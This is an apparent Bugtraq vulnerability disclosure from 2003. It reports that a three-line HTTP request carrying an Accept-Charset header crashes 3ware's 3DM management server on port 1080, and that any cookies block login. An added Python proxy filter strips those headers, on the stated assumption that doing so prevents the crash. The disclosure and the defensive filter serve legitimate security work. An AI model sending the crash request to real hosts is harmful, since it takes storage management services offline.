3Ware 3DM denial of service attack
From: Neulinger, Nathan (nneul@umr.edu)
Date: 01/30/03
Date: Thu, 30 Jan 2003 09:57:37 -0600
From: "Neulinger, Nathan" <nneul@umr.edu>
To: <bugtraq@securityfocus.org>

I've reported this to 3ware at least twice, and never received any
response. Previously I didn't have a test case other than "run a nessus
scan against the host". I've narrowed it down to a reproducible minimum
test case now.

If you connect to 3dm port 1080 on either linux or windows and send:

    GET / HTTP/1.1
    Host: foo
    Accept-Charset: bar

3dm server will terminate immediately.

Other 3dm problems - it flips out and refuses to accept a login if you
have ANY cookies sent. This screws you over if you have a sitewide
.domain.edu cookie for example.
-- Nathan
------------------------------------------------------------
Nathan Neulinger EMail: nneul@umr.edu
University of Missouri - Rolla Phone: (573) 341-4841
Computing Services Fax: (573) 341-4216
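
Added example, not part of the original message and not 3ware code: a header filter that a proxy in front of 3DM could apply, dropping the two headers the report ties to the crash and to the login failure. It assumes Accept-Charset is the trigger, as the minimal test case suggests; the function name and the sample request are constructed for illustration.

```python
# Added example: request-head filter for a proxy placed in front of 3DM.
# BLOCKED_HEADERS reflects the two behaviours reported in the message above
# (assumption: removing the header avoids the reported crash).
BLOCKED_HEADERS = {"accept-charset", "cookie"}

# Constructed sample: the request from the report, with CRLF line endings.
SAMPLE = b"GET / HTTP/1.1\r\nHost: foo\r\nAccept-Charset: bar\r\n\r\n"


def sanitize_request_head(raw: bytes) -> bytes:
    """Return the request with blocked headers removed.

    `raw` must contain the full head (request line, headers, blank line);
    anything after the blank line is passed through unchanged.
    Raises ValueError on an unterminated head or a malformed header line,
    so the proxy can reject the request instead of forwarding it.
    """
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete request head")
    lines = head.split(b"\r\n")
    kept = [lines[0]]          # request line is always forwarded
    dropping = None            # None until the first header has been seen
    for line in lines[1:]:
        if line[:1] in (b" ", b"\t"):
            # Folded continuation line: shares the fate of the header it extends.
            if dropping is None:
                raise ValueError("continuation line before any header")
            if not dropping:
                kept.append(line)
            continue
        name, colon, _ = line.partition(b":")
        # Reject lines with no colon, an empty name, or whitespace around the name.
        if not colon or not name or name != name.strip():
            raise ValueError("malformed header line")
        # Header names are case-insensitive, so compare in lower case.
        dropping = name.decode("latin-1").lower() in BLOCKED_HEADERS
        if not dropping:
            kept.append(line)
    return b"\r\n".join(kept) + b"\r\n\r\n" + rest


if __name__ == "__main__":
    print(sanitize_request_head(SAMPLE))
```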